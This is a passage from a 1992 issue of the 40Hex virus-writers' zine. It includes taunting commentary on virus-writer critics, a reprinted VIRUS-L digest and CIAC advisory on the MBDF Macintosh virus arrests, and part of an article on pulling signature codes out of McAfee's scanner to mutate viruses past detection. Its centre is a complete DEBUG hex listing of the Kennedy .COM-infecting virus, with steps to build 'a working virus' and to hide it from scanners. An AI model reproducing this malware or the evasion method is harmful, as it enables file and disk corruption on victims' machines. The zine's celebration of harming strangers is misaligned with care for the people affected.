||
someday be the same."[I am going to be a certified scholar when I grow up.]
|
||
"What he did was no more than an intellectual prank, a cerebral
|
||
challenge of sorts. Like the man who climbed Mount Everest because it was
|
||
there, he created the virus and sent it fourth because it was there."
|
||
Then, we can hope, the judge might say something like this:
|
||
"Yes, I am impressed by the defendant's brain power. And I
|
||
expected you to ask me to give him a slap on the wrist."
|
||
"However, he is not a child. He is an adult. And I would think
|
||
that so brilliant a grown man would know better than to amuse himself
|
||
by screwing with the lives of strangers." [I haven't screwed one stranger]
|
||
"It's as if he hid inside the businesses and institutions until
|
||
they were closed and everyone had gone home. Then he came out and went
|
||
through every filing cabinet and drawer and shredded or burned every bit
|
||
of useful information he could find."[Cool! Lets try it.]
|
||
"Now, counselor, what would you and your law partners say is some
|
||
street mope [See Thesaurus] did that to your firm - crept in and destroyed
|
||
every document in your offices? Including the names of clients that owe you
|
||
money. Hah, you would be in here asking me to hang him from a tree."[I love
|
||
hanging from trees]
|
||
"So don't give me that smart kid from a good family routine.
|
||
[I ain't smart, and family ain't good] He is a self-centered, insensitive,
|
||
uncaring, arrogant goofball [And damn proud]. He didn't give a second
|
||
thought to the chaos or heartbreak he would cause an adoption agency, a
|
||
hardworking businessman or a medical clinic." [Yes I did. I aim for them.]
|
||
"Therefore, I sentence him to the maximum sentence the law allows
|
||
in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really
|
||
terrible place, filled with all sorts of crude, insensitive hulks."
|
||
[Jay-walkers]
|
||
"Bailiff, please get the defendent up off the floor and administer
|
||
some smelling salts."[More like, why is the defendant laughing?]
|
||
"And change his trousers, quickly."[Fuck you]
|
||
|
||
[]comments added by Demogorgon and GHeap
|
||
|
||
============================================================================
|
||
|
||
|
||
I hope you enjoyed that one as much as I did! Okay, I
|
||
see some really neat things with this man's article. First off,
|
||
I'm sure he's an adept programmer... that is, he can probably
|
||
figure out how to get his VCR to tape something while he is
|
||
off writing his brilliant articles. I enjoy his narrow-minded
|
||
definition of virii (that was mentioned in 40Hex 5), of course,
|
||
all virii are those evil overwriting, trigger date, resident,
|
||
boot track infecting swine (yeah, he probably learned what a
|
||
virus was from watching ABC News covering the Michaelangelo
|
||
crisis!)
|
||
I also enjoy his opinion that all virus authors are
|
||
nerds. First off, what the hell is a nerd? I mean, I have
|
||
written a virus before (not saying it was any good), but, I
|
||
don't feel like a nerd! In fact, I feel quite superior to
|
||
most of the idiots like this guy. And, I like his great
|
||
statement about my loyalty. Yes, I'm gonna narc on [PHALCON/
|
||
[Forget this again, and die]]SKISM for $50,000!!! Yeah, right.
|
||
There are a lot of narcs on this not-so good earth, so choose
|
||
your friends wisely.
|
||
I'm quite sure that ads on BBS's (electronic bulletin
|
||
boards! No... cork ones!) would just sufficiently pump up user
|
||
discussion of virii. I'm not scared of fed intervention, and
|
||
I doubt any authors I know are either.
|
||
This was touched on in 40Hex 5, virus authors are not
|
||
responsible for the spread of their virii unless they are
|
||
actively spreading them! I mean, it's not my fault that K-Rad
|
||
Man sent my Hard Drive Blender (slices, dices, minces sectors)
|
||
to 1000 Bible boards in Utah. Apparently it hasn't dawned on
|
||
this guy that most virii are not written to be destructive.
|
||
Actually, that's a lie. There are a lot of virii out there that
|
||
are descructive, but that is changing. People like the
|
||
PHALCON/SKISM crew realize that not everything must be
|
||
destructive, opening the doors to much larger virus projects
|
||
(ie Bobisms)
|
||
One more thing... QUIT EQUATING THE WORD 'hacker' TO
|
||
EVERY DAMN TYPE OF ELECTRONIC 'crime!!!'
|
||
|
||
|
||
I'm gonna get this dude's phone #, I say we call him
|
||
sometime...
|
||
|
||
|
||
-The Attitude Adjuster-
|
||
40Hex Number 6 Volume 2 Issue 2 File 007
|
||
|
||
|
||
Lets see what good ole' Patty has to say about this:
|
||
|
||
|
||
Virus Name: Kennedy
|
||
Aliases: Dead Kennedy, 333, Kennedy-333
|
||
Scan ID: [Kennedy]
|
||
V Status: Endangered
|
||
Discovered: April, 1990
|
||
Symptoms: .COM growth; message on trigger dates (see text);
|
||
crosslinking of files; lost clusters; FAT corruption
|
||
Origin: Denmark
|
||
Eff Length: 333 Bytes
|
||
Type Code: PNCKF - Parasitic Non-Resident .COM Infector
|
||
Detection Method: ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+,
|
||
NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
|
||
Novi 1.0.1+, Sweep 2.3.1+, UTScan
|
||
Removal Instructions: F-Prot, VirHunt 2.0+, or delete infected files
|
||
General Comments:
|
||
The Kennedy virus was isolated in April 1990. It is a generic
|
||
infector of .COM files, including COMMAND.COM.
|
||
|
||
This virus has three activation dates: June 6 (assassination of
|
||
Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
|
||
and November 22 (assassination of John F. Kennedy 1963) of any year.
|
||
On activation, the virus will display a message the following
|
||
message:
|
||
|
||
"Kennedy is dead - long live 'The Dead Kennedys'"
|
||
|
||
The following text strings can be found in the viral code:
|
||
|
||
"\command.com"
|
||
"The Dead Kennedys"
|
||
|
||
Systems infected with the Kennedy virus will experience
|
||
cross-linking of files, lost clusters, and file allocation table
|
||
errors (including messages that the file allocation table is bad).
|
||
|
||
|
||
--------------------------------Cut Here------------------------------------
|
||
|
||
n kennedy.com
|
||
e 0100 E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8
|
||
e 0110 00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81
|
||
e 0120 FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74
|
||
e 0130 1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00
|
||
e 0140 72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20
|
||
e 0150 02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89
|
||
e 0160 8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B
|
||
e 0170 D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D
|
||
e 0180 E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33
|
||
e 0190 C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81
|
||
e 01A0 3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA
|
||
e 01B0 00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8
|
||
e 01C0 00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94
|
||
e 01D0 05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01
|
||
e 01E0 00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C
|
||
e 01F0 57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8
|
||
e 0200 02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00
|
||
e 0210 2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43
|
||
e 0220 4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B
|
||
e 0230 64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22
|
||
e 0240 54 68 65 20 44 65 61 64 20 4B 65 6E 6E 65 64 79
|
||
e 0250 73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00
|
||
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||
rcx
|
||
027F
|
||
w
|
||
q
|
||
|
||
---------------------------------Cut Here-----------------------------------
|
||
|
||
|
||
Ok there it is. Not the most impressive virus around and its caught by just
|
||
about every scan on the market, but take PKLite to it and then remove the PKLite
|
||
header (Use NOLITE in this issue) and no one will be able to find it. Anyway it
|
||
gets the job done.
|
||
|
||
To make the above hex into a working file, first cut on the dotted lines.
|
||
Name the resulting file KENNEDY.TXT.
|
||
Then: DEBUG < KENNEDY.TXT and you'll have a working virus.
|
||
|
||
|
||
-Instigator
|
||
40Hex Number 6 Volume 2 Issue 2 File 008
|
||
|
||
Take a look at this. I picked it up on fidonet, originally from Virus-L
|
||
digest. all the stuff in *< >*'s are my comments.
|
||
- Demogorgon
|
||
|
||
------------------------------
|
||
VIRUS-L Digest Wednesday, 26 Feb 1992 Volume 5 : Issue 44
|
||
------------------------------
|
||
|
||
Date: Tue, 25 Feb 92 10:10:14 -0500
|
||
>From: mha@baka.ithaca.ny.us (Mark Anbinder)
|
||
Subject: MBDF Suspects Arrested (Mac)
|
||
|
||
The Cornell Daily Sun reported in this morning's issue that two
|
||
Cornell University sophomores, David Blumenthal and Mark Pilgrim, were
|
||
arrested Monday evening and arraigned in Ithaca City Court on one
|
||
count each of second degree computer tampering, in connection with the
|
||
release of the MBDF virus that infected Macs worldwide over the last
|
||
several days. The two are being held in Tompkins County Jail.
|
||
*< huh? How does one get arrested for spreading a virus, you ask? read on >*
|
||
Further charges are pending.
|
||
|
||
---
|
||
** many lines of mail routing crap have been deleted **
|
||
|
||
Date: Tue, 25 Feb 1992 11:47:32 PST
|
||
>From: lipa@camis.stanford.edu (Bill Lipa)
|
||
Subject: Alleged MBDF virus-creators arrested at Cornell
|
||
|
||
"Computer Virus Traced to Cornell Students"
|
||
|
||
by Jeff Carmona
|
||
|
||
[The Cornell Daily Sun, 25 February 1992]
|
||
|
||
Two Cornell students were arrested yesterday for allegedly creating and
|
||
launching *< launching ? Bon voyage, we launched you !>* a computer virus that
|
||
crippled computers around the world, according to M. Stuart Lynn, the
|
||
University's vice president for information technologies.
|
||
David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of
|
||
Public Safety officers and arraigned in Ithaca City Court on one count of
|
||
second-degree computer tampering, a misdemeanor, *< cool, its only a
|
||
misdemeanor, how bad could it be ? >* Lynn said.
|
||
Both students were remanded to the Tompkins County Jail and remained in
|
||
custody early this morning. They are being held on $2,000 cash or $10,000
|
||
bail bond, officials said.
|
||
Cornell received national attention in Nov. 1988 when Robert T. Morris
|
||
Jr., a former graduate student, was accused of unleashing a computer virus
|
||
into thousands of government and university computers.
|
||
Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined
|
||
$10,000, given a three-year probation and ordered to do 400 hours of community
|
||
service by a federal judge in Syracuse, according to Linda Grace-Kobas,
|
||
*< Whats a Koba?? >* director of the Cornell News Service.
|
||
Lynn would not compare the severity of the current case with Morris',
|
||
saying that "each case is different."
|
||
Lynn said the virus, called "MBDFA" was put into three Macintosh games --
|
||
Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle.
|
||
On Feb. 14, the games were launched from Cornell to a public archive at
|
||
Stanford University in Palo Alto, Calif, Lynn said.
|
||
*< I guess these guys actually put it up on the archive under their own >*
|
||
*< accounts! Don't they know they can trace that stuff? duhhh... >*
|
||
From there, the virus spread to computers in Osaka, Japan and elsewhere around
|
||
the world *< the archive was a dumb idea if thats how they got caught, but it
|
||
spread like hell >* when users connected to computer networks via modems, he
|
||
added. It is not known how many computers the virus has affected worldwide, he
|
||
explained.
|
||
When computer users downloaded the infected games, the virus caused "a
|
||
modification of system software," *< oooh...lets not get too technical >* Lynn
|
||
said. "This resulted in unusual behavior and system crashes," he added.
|
||
Lynn said he was not aware of anyone at Cornell who reported finding the
|
||
virus on their computers.
|
||
The virus was traced to Cornell last Friday, authorities were quickly
|
||
notified and an investigation began, Lynn said.
|
||
"We absolutely deplore this kind of bahavior," Lynn said. "We will pursue
|
||
this matter to the fullest."
|
||
Armed with search warrants, Public Safety investigators removed more than
|
||
a dozen crates full of evidence from the students' residences in Baker and
|
||
Founders halls on West Campus. *< sounds like a typical, over-kill bust to
|
||
me. If you don't know what it is, take it. >*
|
||
Public Safety officials refused to disclose the contents of the crates or
|
||
issue any comment about the incident when contacted repeatedly by phone last
|
||
night. *< thats because they don't know what the fuck the stuff is >*
|
||
"We believe this was dealt with very quickly and professionally," Lynn
|
||
said.
|
||
The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today
|
||
and additional charges are pending, according to Grace-Kobas.
|
||
Because spreading a computer virus violates federal laws, "conceivably,
|
||
the FBI could be involved," she added. Officials with the FBI could not be
|
||
reached to confirm or deny this.
|
||
Blumenthal and Pilgrim, both 19-year-olds, were current student employees
|
||
at Cornell Information Technologies (CIT), Lynn said. He would not say
|
||
whether the students launched the virus from their residence hall rooms or
|
||
From a CIT office.
|
||
Henrik N. Dullea '61, vice president for University relations, said he
|
||
thinks "the act will immediately be associated with the University," not
|
||
only with the individual students charged.
|
||
Because a major virus originated from a Cornell student in the past, this
|
||
latest incident may again "bring a negative reaction to the entire
|
||
institution," Dullea said. *< "blah, blah, blah" >*
|
||
"These are very selfish acts," Lynn said, referring to the intentional
|
||
distribution of computer viruses, because innocent people are harmed.
|
||
Lynn said he was unaware of the students' motive for initiating the virus.
|
||
Lynn said CIT put out a notice yesterday to inform computer users about the
|
||
"very virulent" virus. A virus-protection program, such as the new version of
|
||
Disinfectant, can usually cure computers, but it may be necessary to "rebuild
|
||
the hard drive" *< egad! Not the dreaded "virus-that-makes-you-rebuild-your-
|
||
hard-drive" !>* in some cases, he added.
|
||
A former roommate of Blumenthal said he was not surprised by news of the
|
||
arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller
|
||
'95, his roommate from last semester. "He was in front of the computer all
|
||
day," Fuller said.
|
||
Blumenthal, who had a modem, would "play around with viruses because they
|
||
were a challenge to him," Fuller said. He said that, to his knowledge,
|
||
Blumenthal had never released a virus before.
|
||
|
||
-->-<------ Cut Here --------------------------
|
||
|
||
------------------------------
|
||
VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46
|
||
------------------------------
|
||
|
||
Date: Wed, 26 Feb 92 11:08:45 -0800
|
||
>From: karyn@cheetah.llnl.gov (Karyn Pichnarczyk)
|
||
Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac)
|
||
|
||
NO RESTRICTIONS
|
||
_____________________________________________________
|
||
The Computer Incident Advisory Capability
|
||
___ __ __ _ ___
|
||
/ | / \ /
|
||
\___ __|__ /___\ \___
|
||
_____________________________________________________
|
||
INFORMATION BULLETIN
|
||
|
||
New Virus on Macintosh Computers: MBDF A
|
||
|
||
February 25, 1992, 1130 PST Number C-17
|
||
|
||
________________________________________________________________________
|
||
NAME: MBDF A virus
|
||
PLATFORM: Macintosh computers-except MacPlus and SE (see below)
|
||
DAMAGE: May cause program crashes
|
||
SYMPTOMS: Claris applications indicate they have been altered; some
|
||
shareware may not work, unexplained system crashes
|
||
DETECTION &
|
||
ERADICATION: Disinfectant 2.6,Gatekeeper 1.2.4, Virex 3.6,
|
||
VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0
|
||
________________________________________________________________________
|
||
Critical Facts about MBDF A
|
||
|
||
A new Macintosh virus, MBDF A, (named for the resource it exploits)
|
||
has been discovered. This virus does not appear to maliciously cause
|
||
damage, but simply copies itself from one application to another.
|
||
MBDF A was discovered at two archive sites in newly posted game
|
||
applications, and has a high potential to be very widespread.
|
||
|
||
Infection Mechanism
|
||
|
||
This virus is an "implied loader" virus, and it works in a similar
|
||
manner to other implied loader viruses such as CDEF and MDEF. Once
|
||
the virus is active, clean appliacation programs will become infected
|
||
as soon as they are executed. MBDF A infects only applications, and
|
||
does not affect data files. This virus replicates under both System 6
|
||
and System 7. While MBDF A may be present on ALL types of Macintosh
|
||
systems, it will not spread if the infected system is a MacPlus or a
|
||
Mac SE (although it does spread on an SE/30).
|
||
|
||
Potential Damage
|
||
|
||
The MBDF A virus has no malicious damaging characteristics, however,
|
||
it may cause programs to inexplicably crash when an item is selected
|
||
from the menu bar. Some programs, such as the shareware
|
||
"BeHierarchic" program, have been reported to not operate correctly
|
||
when infected. Applications written with self-checking code, such as
|
||
those written by the Claris corporation, will inform the user that
|
||
they have been altered.
|
||
|
||
When MBDF A infects the system file, it must re-write the entire
|
||
system file back to disk; this process may take two or three minutes.
|
||
If the user assumes the system has hung, and reboots the Macintosh
|
||
while this is occuring, the entire system file will be corrupted and
|
||
an entire reload of system software must then be performed.
|
||
|
||
This virus can be safely eradicated from most infected programs,
|
||
although CIAC recommends that you restore all infected files from an
|
||
uninfected backup.
|
||
|
||
Detection and Eradication
|
||
|
||
Because MBDF A has been recently discovered, only anti-viral packages
|
||
updated since February 20, 1992 will locate and eradicate this virus.
|
||
All the major Macintosh anti-viral product vendors are aware of this
|
||
virus and have scheduled updates for their products. These updates
|
||
have all been available since February 24, 1992. The updated versions
|
||
of some products are Disinfectant 2.6, Gatekeeper 1.2.4, Virex 3.6,
|
||
SAM 3.0, VirusDetective 5.0.2, and Rival 1.1.10. Some Macintosh
|
||
applications (such as the Claris software mentioned above) may contain
|
||
self-verification procedures to ensure the program is valid before
|
||
each execution; these programs will note unexpected alterations to
|
||
their code and will inform the user.
|
||
|
||
MBDF A has been positively identified as present in two shareware
|
||
games distributed by reliable archive sites: "Obnoxious Tetris" and
|
||
"Ten Tile Puzzle". The program "Tetricycle" (sometimes named
|
||
"Tetris-rotating") is a Trojan Horse program which installs the virus.
|
||
If you have downloaded these or any other software since February 14,
|
||
1992 (the day these programs were loaded to the archive sites), CIAC
|
||
recommends that you acquire an updated version of an anti-viral
|
||
product and scan your system for the existence of MBDF A.
|
||
|
||
For additional information or assistance, please contact CIAC:
|
||
|
||
Karyn Pichnarczyk
|
||
(510) 422-1779 or (FTS) 532-1779
|
||
karyn@cheetah.llnl.gov
|
||
|
||
Call CIAC at (510)422-8193/(FTS)532-8193.
|
||
Send e-mail to ciac@llnl.gov
|
||
|
||
PLEASE NOTE: Many users outside of the DOE and ESnet computing
|
||
communities receive CIAC bulletins. If you are not part of these
|
||
communities, please contact your agency's response team to report
|
||
incidents. Some of the other teams include the NASA NSI response
|
||
team, DARPA's CERT/CC, NAVCIRT, and the Air Force response team. Your
|
||
agency's team will coordinate with CIAC.
|
||
|
||
CIAC would like to thank Gene Spafford and John Norstad, who provided
|
||
some of the information used in this bulletin. This document was
|
||
prepared as an account of work sponsored by an agency of the United
|
||
States Government. Neither the United States Government nor the
|
||
University of California nor any of their employees, makes any
|
||
warranty, express or implied, or assumes any legal liability or
|
||
responsibility for the accuracy, completeness, or usefulness of any
|
||
information, apparatus, product, or process disclosed, or represents
|
||
that its use would not infringe privately owned rights. Reference
|
||
herein to any specific commercial products, process, or service by
|
||
trade name, trademark, manufacturer, or otherwise, does not
|
||
necessarily constitute or imply its endorsement, recommendation or
|
||
favoring by the United States Government or the University of
|
||
California. The views and opinions of authors expressed herein do not
|
||
necessarily state or reflect those of the United States Government or
|
||
the University of California, and shall not be used for advertising or
|
||
product endorsement purposes.
|
||
|
||
-->-<----- Cut Here -------------------------
|
||
|
||
---
|
||
|
||
------------------------------
|
||
VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46
|
||
------------------------------
|
||
|
||
Date: Wed, 26 Feb 92 15:32:02 -0500
|
||
>From: mha@baka.ithaca.ny.us (Mark Anbinder)
|
||
Subject: Cornell MBDF Press Release (Mac)
|
||
|
||
_____________________________________________________
|
||
PRESS RELEASE ISSUED BY CORNELL NEWS SERVICE 2/25/91
|
||
|
||
Students charged
|
||
with releasing
|
||
computer virus
|
||
|
||
By Linda Grace-Kobas
|
||
|
||
Following a university investigation that tracked a computer virus and
|
||
its originators, two Cornell students were arrested and charged with
|
||
computer tampering for allegedly launching a computer virus embedded in
|
||
three games into national computer archives. Arraigned Feb. 24 in
|
||
Ithaca City Court were David S. Blumenthal, 19, a sophomore in the
|
||
College of Engineering, and Mark Andrew Pilgrim, 19, a sophomore in the
|
||
College of Arts and Sciences. They were charged with computer tampering
|
||
in the second degree, a Class A misdemeanor. The pair is being held in
|
||
Tompkins County Jail with bail set at $2,000 cash bond or $10,000
|
||
property bond. At a hearing Tuesday afternoon, Judge Sherman returned
|
||
the two to jail with the same bond and recommended that they remain in
|
||
jail until at least Friday pending the federal investigation. A
|
||
preliminary hearing is set for April 10.
|
||
|
||
Both students were employed by Cornell Information Technologies, which
|
||
runs the university's computer facilities. Pilgrim worked as a student
|
||
operator in an Apple Macintosh facility from which the virus is believed
|
||
to have been launched. The university's Department of Public Safety is
|
||
working with the Tompkins County district attorney's office, and
|
||
additional charges are expected to be filed. The Federal Bureau of
|
||
Investigation has contacted the university to look at possible violations
|
||
of federal laws, officials said. The Ithaca Police Department is also
|
||
assisting in the investigation.
|
||
|
||
"We absolutely abhor this type of behavior, which appears to violate the
|
||
university's computer abuse policy as well as applicable state and
|
||
federal law," commented M. Stuart Lynn, vice president for information
|
||
technologies, who headed the investigation to track the originators of
|
||
the virus. "Cornell will pursue all applicable remedies under our own
|
||
policies and will cooperate with law enforcement authorities."
|
||
|
||
Lynn said Cornell was alerted Feb. 21 that a Macintosh computer virus
|
||
embedded in versions of three computer games, Obnoxious Tetris,
|
||
Tetricycle and Ten Tile Puzzle, had possibly been launched through a
|
||
Cornell computer. A virus is normally embedded in a program and only
|
||
propagates to other programs on the host system, he explained.
|
||
Typically, when an infected application is run, the virus will attack the
|
||
system software and then other applications will become infected as they
|
||
are run.
|
||
|
||
The virus, MBDF-A, had been deposited on Feb. 14 directly and indirectly
|
||
into several computer archives in the U.S. and abroad, including
|
||
SUMEX-AIM at Stanford University and archives at the University of Texas,
|
||
the University of Michigan and another in Osaka, Japan. These archives
|
||
store thousands of computer programs available to users of Internet, the
|
||
worldwide computer network.
|
||
|
||
Macintosh users who downloaded the games to their computers were subject
|
||
to a variety of problems, notably the modification of system software and
|
||
application programs, resulting in unusual behavior and possible system
|
||
crashes. Apparently, there was no intent to destroy data, Lynn said, but
|
||
data could be destroyed in system crashes.
|
||
|
||
Reports of the virus have been received from across the United States and
|
||
around the world, including Wales, Britain, Lynn said, adding that he has
|
||
no estimate for the number of individuals who might have obtained the
|
||
games.
|
||
|
||
As soon as the virus was identified, individuals and groups across the
|
||
country involved with tracking viruses sent messages across computer
|
||
networks to alert users who might have been affected by the virus, Lynn
|
||
added. The virus has since been removed from all archives and
|
||
"disinfectant" software available to the Internet community has been
|
||
modified so that individual Macintosh users can purge their computers of
|
||
it.
|
||
|
||
"Our sense is that the virus was controlled very rapidly," he said. In
|
||
1988, Cornell received national attention when graduate student Robert T.
|
||
Morris Jr. launched a computer virus into important government and
|
||
university research networks. That virus, actually considered a "worm"
|
||
since it was self-perpetuating, caused major damage in high-level
|
||
systems. Morris was convicted under the 1986 Computer Fraud and Abuse
|
||
Act and fined $10,000, given three years probation and ordered to do 400
|
||
hours of community service by a federal judge in Syracuse, N.Y.
|
||
|
||
The new virus differs greatly from the Morris worm, Lynn said. "This
|
||
virus is not to be compared with the Morris worm, which independently
|
||
moved from machine to machine across the network," he explained. All
|
||
Macintosh users should take appropriate measures to be certain their
|
||
systems are not infected with the virus.
|
||
|
||
News Service science writer William Holder also contributed to
|
||
this report.
|
||
|
||
---
|
||
Mark H. Anbinder 607-257-2070 - FAX 607-257-2657
|
||
BAKA Computers, Inc. QuickMail QM-QM 607-257-2614
|
||
200 Pleasant Grove Road mha@baka.ithaca.ny.us
|
||
Ithaca, NY 14850
|
||
|
||
-->-<----- Cut Here -------------------------
|
||
40Hex Number 6 Volume 2 Issue 2 File 009
|
||
|
||
-=[ The 'McAfee scan' viral footprint codes ]=-
|
||
|
||
-or-
|
||
|
||
/*******************************************/
|
||
/* A fool and his scanner, can part a user */
|
||
/* from his hard earned money. */
|
||
/*******************************************/
|
||
|
||
- written by -
|
||
GodNet Raider
|
||
- of -
|
||
The CyberUnderground
|
||
|
||
|
||
Thrown into 40Hex by DecimatoR
|
||
from Usenet alt.security
|
||
|
||
-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
|
||
|
||
]----------------------------------------------------------------------------[
|
||
|
||
Introduction:
|
||
-------------
|
||
|
||
Recently I began to wonder about the usefulness of 'virus scanners'
|
||
and what if any difference do they have with a simple text/hex search
|
||
program (like nortons filefind/ts). An if there was no real DIFFERENCE,
|
||
how secure is the system that used them.
|
||
|
||
Problems with scanning:
|
||
-----------------------
|
||
|
||
The first question I had to ask was, What does a 'virus scanner' actually
|
||
look for? Does it only look for one string of codes or several at different
|
||
places in the file?
|
||
|
||
To answer this question I called a local BBS an dl'ed McAfee's
|
||
scan3.7v64 (to evaluate and after my tests, it was erased for its lack of
|
||
offering any real protection). Then I went to my archives to retrieve some
|
||
viruses I have experimented with in the past (of which where Jerusalem B and
|
||
Dark Avenger).
|
||
|
||
I ran scan to verify that the virus files where viruses (3 of which did
|
||
not set off any alarm even tho there was a listing in the documentation for
|
||
them, so I removed them from the test). Then using a sector editor looked at
|
||
the source for the McAfee asso. scan3.7v64 (here after know just as scan64)
|
||
to find that the footprint information was encoded. Needless to say this did
|
||
not stop me (for the sake of those who are into the tech aspects of things,
|
||
the actual method used to get the codes are included at the end of the
|
||
article with the codes found), It took less than an hour to get the codes I
|
||
was looking for (without disassembling the code but by looking into the
|
||
memory allocated to the program).
|
||
|
||
What I found out was scan was just a simple hex searcher (that kept
|
||
its data locked up till needed). It could also be fooled by any program
|
||
that contained the same hex string as a real virus (this was proved when
|
||
, using a sector editor, I added the scan64 footprint for the Jerusalem B
|
||
into the top of a text file (a place this code would never show up in a real
|
||
infection) then renamed it to *.com; scan64 reported it as infected).
|
||
|
||
Once the codes where obtained, using debug directly on a virus file,
|
||
I was able to mutate the virus to no longer be detectable by scan64 without
|
||
destroying the integrity of it. For the virus was still able to infect files,
|
||
and scan64 could no longer track it. I was still able to track and control it
|
||
using norton's filefind, diskmon, diskedit, and (of course) DOS erase.
|
||
|
||
So it seems my question was answered. Some 'virus scanners' just scan
|
||
for a single string of hex character. This is fine if viruses NEVER changed
|
||
or programs would NEVER use code similar to what a virus would (the smaller
|
||
the footprint string the bigger the chance of mistaken alarms). For if
|
||
a 'virus scanner' programer just keeps making a new release each time there
|
||
is a new virus (an I will not get into the morality of charging customers
|
||
the full price of an software upgrade rather than allowing them to buy/dl
|
||
new footprint data files as they become available) for the program will
|
||
eventually grow to unwealdable sizes. An it should be noted there are other
|
||
programs that may do the same job faster, more upward compatibility, and
|
||
you may already have them on hand.
|
||
|
||
a possible solution:
|
||
--------------------
|
||
|
||
One thing that I think is a good idea is when a program allows users
|
||
to add new footprint data to it (like nortons' virus package). For now
|
||
users don't need to buy new releases for detection of viruses they may not
|
||
get/be able to detect. Instead for the cost of a call to a support bbs (part
|
||
of the original software agreement?) the user can get new data as it becomes
|
||
available or when they fine a new one on their system they can immediately
|
||
add the new footprint rather than wait for the next version to be released.
|
||
|
||
Method used to obtain footprints:
|
||
---------------------------------
|
||
|
||
After finding the data I was looking for was encoded I thought, How can
|
||
I get the data I wanted for my tests?
|
||
|
||
Disassembling was out, not for any MORAL reason but, for the time
|
||
involved. So I thought it must have to decode the data for it's own use
|
||
and to save time it would do it all before the scan rather than slow the
|
||
process down by doing a full decode. So I needed to look at the memory
|
||
image of the running program. Thanks to DOS 5.0 and dosshell I was able to
|
||
do this.
|
||
|
||
After spawning the scan task under the dos shell I used alt-tab to
|
||
swap back to the shell. Once back in the shell I used the shell commands to
|
||
copy the |